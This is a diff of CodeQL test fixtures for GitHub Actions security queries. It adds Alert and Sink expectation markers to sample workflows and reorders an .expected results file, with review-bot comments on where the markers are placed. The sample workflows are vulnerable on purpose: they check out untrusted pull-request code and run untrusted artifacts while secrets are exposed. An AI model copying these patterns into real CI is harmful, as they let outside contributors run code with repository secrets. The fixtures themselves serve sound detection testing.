@@ -30,12 +30,12 @@ jobs: let fs = require('fs'); fs.writeFileSync(`${process.env.GITHUB_WORKSPACE}/rsc-pr-build-artifacts.zip`, Buffer.from(download.data)); - - name: Unzip artifacts + - name: Unzip artifacts # $ Alert[actions/artifact-poisoning/critical] run: unzip rsc-pr-build-artifacts.zip - name: SonarCloud Scan - uses: sonarsource/sonarcloud-github-action@master + uses: sonarsource/sonarcloud-github-action@master # $ Alert[actions/unpinned-tag] env: GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} - SONAR_TOKEN: ${{ secrets.SONAR_TOKEN }} + SONAR_TOKEN: ${{ secrets.SONAR_TOKEN }} # $ Sink[actions/artifact-poisoning/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test22.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test22.yml index 2f3b0bb876f6..4cf7a49245c2 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test22.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test22.yml @@ -59,4 +59,4 @@ jobs: with: ref: ${{ needs.bump-version.outputs.release_branch || github.ref }} - - run: ./bin/build-plugin-zip.sh + - run: ./bin/build-plugin-zip.sh # $ Alert[actions/unversioned-immutable-action] diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test25.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test25.yml index c825cc73813b..1404c559b0a8 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test25.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test25.yml @@ -29,7 +29,7 @@ jobs: run-id: ${{ github.event.workflow_run.id }} # Don't fail a build if the file doesn't exist continue-on-error: true - - name: Extract previously uploaded build scan content + - name: Extract previously uploaded build scan content # $ Alert[actions/artifact-poisoning/critical] if: ${{ steps.downloadBuildScan.outcome != 'failure'}} run: tar -xzf build-scan.tgz -C ~ - name: Publish 
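Review bot: In test25.yml the `Alert[actions/artifact-poisoning/critical]` marker on `- name: Extract previously uploaded build scan content` reads as if the `tar -xzf` step were the flagged element, but ArtifactPoisoningCritical.expected reports the alert at `test25.yml:22:9:32:6 | Uses Step: downloadBuildScan`. That is the download step, whose location only ends on this line (new line 32 by this hunk's numbering), and it begins above the hunk. The same offset appears elsewhere in this patch, for example `- run: make foo # $ Alert[actions/unversioned-immutable-action]` in test28.yml and the `Sink` markers on the job keys `mantis-e2e:`, `dependabot-auto-merge:` and `test2:`. These fixtures double as examples of what the queries flag, so I would record the convention once in the commit message or a README next to the tests, e.g. `Markers appear to be matched on the end line of a result's location, so they sit on the line that follows the step they describe.`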
@@ -37,6 +37,6 @@ jobs: # Don't fail a build if publishing fails continue-on-error: true run: | - ./gradlew buildScanPublishPrevious + ./gradlew buildScanPublishPrevious # $ Sink[actions/artifact-poisoning/critical] env: ACCESS_KEY: ${{ secrets.TEST_ACCESS_KEY }} diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test27.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test27.yml index b1d776ef6c8a..9b7a6c535c61 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test27.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test27.yml @@ -18,5 +18,5 @@ jobs: - uses: actions/checkout@9bb56186c3b09b4f86b1c65136769dd318469633 # v4.1.2 with: ref: ${{ inputs.git_ref }} - - run: | - ./cmd + - run: | # $ Alert[actions/untrusted-checkout/critical] Alert[actions/unversioned-immutable-action] + ./cmd # $ Sink[actions/untrusted-checkout/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test28.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test28.yml index 5f67fecc09a5..16d84cd70f73 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test28.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test28.yml @@ -17,4 +17,4 @@ jobs: - uses: actions/checkout@eef61447b9ff4aafe5dcd4e0bbf5d482be7e7871 # v4.2.1 with: ref: ${{ github.head_ref }} - - run: make foo + - run: make foo # $ Alert[actions/unversioned-immutable-action] diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test29.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test29.yml index cc7f71a7b3e4..afbb3f0a433a 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test29.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test29.yml 
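Review bot: The `Sink` marker appended to `./gradlew buildScanPublishPrevious` in test25.yml sits inside the `run: |` block scalar, where `#` does not start a YAML comment, so the marker text becomes part of the script value the query analyses. ArtifactPoisoningCritical.expected in this same patch still lists that node as `./gradlew buildScanPublishPrevious\n` ending at `40:45`, which appears to match the line without the marker. Unless a later patch in the series regenerates that file, I would regenerate it once the markers are in place and confirm the label and end column. The other in-script markers deserve the same check: `rm deploy.out`, `./cmd` in test27.yml, `npm run lint` in untrusted_checkout.yml, `gh pr checkout` in untrusted_checkout2.yml and `echo "BUMP_TYPE=patch" >> $GITHUB_ENV` in untrusted_checkout4.yml. The standalone marker lines that replace a blank line after a block scalar in reusable_local.yml and test29.yml are YAML comments only if they are indented less than the scalar body, which the hunks as shown do not let me confirm.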
@@ -11,11 +11,11 @@ jobs: ref: ${{ github.event.pull_request.head.sha }} fetch-depth: 0 - - uses: actions/github-script@v5 + - uses: actions/github-script@v5 # $ Alert[actions/untrusted-checkout/critical] with: github-token: ${{secrets.GITHUB_TOKEN}} script: | const { foo } = require('./foo'); - + # $ Sink[actions/untrusted-checkout/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test3.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test3.yml index d9aa2973e007..8c45b9f89303 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test3.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test3.yml @@ -30,7 +30,7 @@ jobs: with: ref: ${{ github.event.pull_request.head.ref }} repository: ${{ github.event.pull_request.head.repo.full_name }} - - run: npm install + - run: npm install # $ Alert[actions/untrusted-checkout/medium] working-directory: scripts/github-actions/semantic-pull-request/ - name: Lint PR Title if: github.event_name == 'pull_request_target' diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test4.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test4.yml index f82f493cd6e0..5d143bb3f859 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test4.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test4.yml @@ -22,7 +22,7 @@ jobs: ref: ${{ github.event.pull_request.head.ref }} repository: ${{ github.event.pull_request.head.repo.full_name }} - - name: Checkout + - name: Checkout # $ Alert[actions/untrusted-checkout/medium] if: ${{ github.event_name != 'pull_request_target' }} uses: actions/checkout@v3 with: diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test7.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test7.yml index 7a346a897e45..99b3c1d49008 100644 
--- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test7.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test7.yml @@ -21,8 +21,8 @@ jobs: persist-credentials: false ref: refs/pull/${{ github.event.issue.number }}/head - - name: Setup PNPM - uses: pnpm/action-setup@v3 + - name: Setup PNPM # $ Alert[actions/untrusted-checkout/critical] + uses: pnpm/action-setup@v3 # $ Alert[actions/unpinned-tag] - name: Setup Node uses: actions/setup-node@v4 @@ -33,10 +33,10 @@ jobs: - name: Install dependencies run: pnpm install - - name: Build Packages + - name: Build Packages # $ Sink[actions/untrusted-checkout/critical] run: pnpm run build - - name: Get bench command + - name: Get bench command # $ Sink[actions/untrusted-checkout/critical] id: bench-command env: # protects from untrusted user input and command injection @@ -56,5 +56,5 @@ jobs: echo "$processed" >> $GITHUB_OUTPUT echo "BENCHEOF" >> $GITHUB_OUTPUT shell: bash - - run: python2.7 foo.py - - run: pip install --no-deps . + - run: python2.7 foo.py # $ Sink[actions/untrusted-checkout/critical] + - run: pip install --no-deps . # $ Sink[actions/untrusted-checkout/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test8.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test8.yml index 381cc16a6d16..bb28d082ac57 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test8.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test8.yml 
@@ -23,7 +23,7 @@ jobs: ref: ${{ github.event.pull_request.head.sha }} repository: ${{ github.event.pull_request.head.repo.full_name }} fetch-depth: 0 - - name: Generate openapi.json + - name: Generate openapi.json # $ Alert[actions/untrusted-checkout/medium] Alert[actions/unversioned-immutable-action] run: dotnet test tests/Jellyfin.Server.Integration.Tests/Jellyfin.Server.Integration.Tests.csproj -c Release --filter "Jellyfin.Server.Integration.Tests.OpenApiSpecTests" publish-unstable: diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test9.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test9.yml index 6f7ff665be3b..2c8007b99846 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test9.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test9.yml @@ -13,6 +13,6 @@ jobs: ref: ${{ github.event.pull_request.head.sha }} repository: ${{ github.event.pull_request.head.repo.full_name }} fetch-depth: 0 - - run: + - run: # $ Alert[actions/untrusted-checkout/medium] Alert[actions/unversioned-immutable-action] sed -f script/config foo.md > bar.md diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/unpinned_tags.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/unpinned_tags.yml index 6e7612144bcc..eef43d011d4c 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/unpinned_tags.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/unpinned_tags.yml 
@@ -7,13 +7,13 @@ jobs: runs-on: ubuntu-latest steps: - uses: foo/bar - - uses: foo/bar@v1 + - uses: foo/bar@v1 # $ Alert[actions/unpinned-tag] - uses: foo/bar@25b062c917b0c75f8b47d8469aff6c94ffd89abb - - uses: docker://foo/bar@latest + - uses: docker://foo/bar@latest # $ Alert[actions/unpinned-tag] - uses: docker://foo/bar@sha256:887a259a5a534f3c4f36cb02dca341673c6089431057242cdc931e9f133147e9 # SHA-256 pinned (64 hex chars) - should NOT be flagged - uses: foo/bar@25b062c917b0c75f8b47d8469aff6c94ffd89abb25b062c917b0c75f8b47d84d # SHA-1 pinned (40 hex chars) regression - should NOT be flagged - uses: foo/bar@a1b2c3d4e5f6a1b2c3d4e5f6a1b2c3d4e5f6a1b2 # Invalid 50-char hex string - should be flagged - - uses: foo/bar@a1b2c3d4e5f6a1b2c3d4e5f6a1b2c3d4e5f6a1b2a1b2c3d4e5 + - uses: foo/bar@a1b2c3d4e5f6a1b2c3d4e5f6a1b2c3d4e5f6a1b2a1b2c3d4e5 # $ Alert[actions/unpinned-tag] diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout.yml index 15d4813c40e9..5119b7384ea2 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout.yml @@ -8,14 +8,14 @@ jobs: - uses: actions/checkout@v2 with: ref: ${{ github.event.pull_request.head.sha }} - - name: Setup Node.js + - name: Setup Node.js # $ Alert[actions/untrusted-checkout/critical] uses: actions/setup-node@v4 with: node-version: 21 - run: | npm install npm run lint - test2: + test2: # $ Sink[actions/untrusted-checkout/critical] runs-on: ubuntu-latest env: HEAD: ${{ github.event.pull_request.head.sha }} 
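Review bot: In unpinned_tags.yml the first step, `- uses: foo/bar` with no ref at all, carries no marker, which under inline expectations presumably asserts that `actions/unpinned-tag` reports nothing for it. The hash-pinned negatives further down are commented as "should NOT be flagged", but this one has no explanation, so a reader cannot tell whether the missing alert is intended or a gap in the query. I would add a trailing note on that line, which keeps the line numbers stable, e.g. `- uses: foo/bar # no ref: not reported by actions/unpinned-tag`, or add an `Alert` marker if a ref-less reference is meant to be flagged.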
@@ -23,10 +23,10 @@ jobs: - uses: actions/checkout@v2 with: ref: ${{ env.HEAD }} - - name: Setup Node.js + - name: Setup Node.js # $ Alert[actions/untrusted-checkout/critical] uses: actions/setup-node@v4 with: node-version: 21 - run: | npm install - npm run lint + npm run lint # $ Sink[actions/untrusted-checkout/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout2.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout2.yml index 47a0dfc6bd34..644738a76059 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout2.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout2.yml @@ -16,4 +16,4 @@ jobs: env: GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} run: | - gh pr checkout ${{ needs.should_run_it.outputs.pr_number }} + gh pr checkout ${{ needs.should_run_it.outputs.pr_number }} # $ Alert[actions/untrusted-checkout/high] diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout3.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout3.yml index 0a38be8b12be..1001c8549785 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout3.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout3.yml @@ -10,4 +10,4 @@ jobs: steps: - uses: actions/checkout@v4 - uses: ./.github/actions/dangerous-git-checkout - - run: yarn test + - run: yarn test # $ Sink[actions/untrusted-checkout/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout4.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout4.yml index 7e154502c139..f06228207876 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout4.yml 
+++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout4.yml @@ -32,20 +32,20 @@ jobs: repository: ${{ fromJSON(steps.get-pr.outputs.result).head.repo.full_name }} ref: ${{ fromJSON(steps.get-pr.outputs.result).head.ref }} - - name: Update version minor + - name: Update version minor # $ Alert[actions/untrusted-checkout/critical] if: contains(github.event.comment.body, '/version minor') run: | ./version.sh -u -n echo "BUMP_TYPE=minor" >> $GITHUB_ENV - - name: Update version major + - name: Update version major # $ Sink[actions/untrusted-checkout/critical] if: contains(github.event.comment.body, '/version major') run: | ./version.sh -u -m echo "BUMP_TYPE=major" >> $GITHUB_ENV - - name: Update version patch + - name: Update version patch # $ Sink[actions/untrusted-checkout/critical] if: contains(github.event.comment.body, '/version patch') run: | ./version.sh -u -p - echo "BUMP_TYPE=patch" >> $GITHUB_ENV + echo "BUMP_TYPE=patch" >> $GITHUB_ENV # $ Sink[actions/untrusted-checkout/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/workflow_run_untrusted_checkout.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/workflow_run_untrusted_checkout.yml index c802355d102a..145cb77b8298 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/workflow_run_untrusted_checkout.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/workflow_run_untrusted_checkout.yml @@ -13,7 +13,7 @@ jobs: - uses: actions/checkout@v2 with: ref: ${{ github.event.workflow_run.head.sha }} - - uses: actions/checkout@v2 + - uses: actions/checkout@v2 # $ Alert[actions/untrusted-checkout/high] with: - ref: ${{ env.HEAD }} + ref: ${{ env.HEAD }} # $ Alert[actions/untrusted-checkout/high] 
diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/workflow_run_untrusted_checkout_2.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/workflow_run_untrusted_checkout_2.yml index bcde60f55cb8..3cbd9d698dd7 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/workflow_run_untrusted_checkout_2.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/workflow_run_untrusted_checkout_2.yml @@ -13,7 +13,7 @@ jobs: - uses: actions/checkout@v2 with: ref: ${{ github.event.workflow_run.head.sha }} - - uses: actions/checkout@v2 + - uses: actions/checkout@v2 # $ Alert[actions/untrusted-checkout/high] with: - ref: ${{ env.HEAD }} + ref: ${{ env.HEAD }} # $ Alert[actions/untrusted-checkout/high] diff --git a/actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected b/actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected index 3c5f6bf93e98..df0776a8b0f1 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected +++ b/actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected 
@@ -1,3 +1,22 @@ +#select +| .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/artifactpoisoning92.yml:3:3:3:14 | workflow_run | workflow_run | +| .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/artifactpoisoning92.yml:3:3:3:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/artifactpoisoning11.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:38:11:38:25 | python foo/x.py | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). 
| .github/workflows/artifactpoisoning12.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/artifactpoisoning21.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | .github/workflows/artifactpoisoning22.yml:18:14:18:19 | sh cmd | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/artifactpoisoning22.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/artifactpoisoning31.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning32.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning32.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning32.yml:17:14:18:20 | ./bar/cmd\n | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). 
| .github/workflows/artifactpoisoning32.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning33.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning33.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning33.yml:17:14:18:20 | ./bar/cmd\n | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/artifactpoisoning33.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning34.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning34.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning34.yml:20:14:22:23 | npm install\nnpm run lint\n | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/artifactpoisoning34.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/artifactpoisoning41.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). 
| .github/workflows/artifactpoisoning42.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/artifactpoisoning71.yml:4:5:4:16 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/artifactpoisoning81.yml:3:5:3:23 | pull_request_target | pull_request_target | +| .github/workflows/artifactpoisoning96.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning96.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning96.yml:18:14:18:24 | npm install | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/artifactpoisoning96.yml:2:3:2:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning101.yml:10:9:16:6 | Uses Step | .github/workflows/artifactpoisoning101.yml:10:9:16:6 | Uses Step | .github/workflows/artifactpoisoning101.yml:17:14:19:59 | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). 
| .github/workflows/artifactpoisoning101.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test18.yml:12:15:33:12 | Uses Step | .github/workflows/test18.yml:12:15:33:12 | Uses Step | .github/workflows/test18.yml:36:15:40:58 | Uses Step | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/test18.yml:3:5:3:16 | workflow_run | workflow_run | +| .github/workflows/test25.yml:22:9:32:6 | Uses Step: downloadBuildScan | .github/workflows/test25.yml:22:9:32:6 | Uses Step: downloadBuildScan | .github/workflows/test25.yml:39:14:40:45 | ./gradlew buildScanPublishPrevious\n | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/test25.yml:2:3:2:14 | workflow_run | workflow_run | edges | .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | provenance | Config | | .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | provenance | Config | 
@@ -54,22 +73,3 @@ nodes | .github/workflows/test25.yml:22:9:32:6 | Uses Step: downloadBuildScan | semmle.label | Uses Step: downloadBuildScan | | .github/workflows/test25.yml:39:14:40:45 | ./gradlew buildScanPublishPrevious\n | semmle.label | ./gradlew buildScanPublishPrevious\n | subpaths -#select -| .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/artifactpoisoning92.yml:3:3:3:14 | workflow_run | workflow_run | -| .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/artifactpoisoning92.yml:3:3:3:14 | workflow_run | workflow_run | -| .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/artifactpoisoning11.yml:4:3:4:14 | workflow_run | workflow_run | -| .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:38:11:38:25 | python foo/x.py | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). 
| .github/workflows/artifactpoisoning12.yml:4:3:4:14 | workflow_run | workflow_run | -| .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/artifactpoisoning21.yml:4:3:4:14 | workflow_run | workflow_run | -| .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | .github/workflows/artifactpoisoning22.yml:18:14:18:19 | sh cmd | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/artifactpoisoning22.yml:4:3:4:14 | workflow_run | workflow_run | -| .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/artifactpoisoning31.yml:4:3:4:14 | workflow_run | workflow_run | -| .github/workflows/artifactpoisoning32.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning32.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning32.yml:17:14:18:20 | ./bar/cmd\n | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). 
| .github/workflows/artifactpoisoning32.yml:4:3:4:14 | workflow_run | workflow_run | -| .github/workflows/artifactpoisoning33.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning33.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning33.yml:17:14:18:20 | ./bar/cmd\n | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/artifactpoisoning33.yml:4:3:4:14 | workflow_run | workflow_run | -| .github/workflows/artifactpoisoning34.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning34.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning34.yml:20:14:22:23 | npm install\nnpm run lint\n | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/artifactpoisoning34.yml:4:3:4:14 | workflow_run | workflow_run | -| .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/artifactpoisoning41.yml:4:3:4:14 | workflow_run | workflow_run | -| .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). 
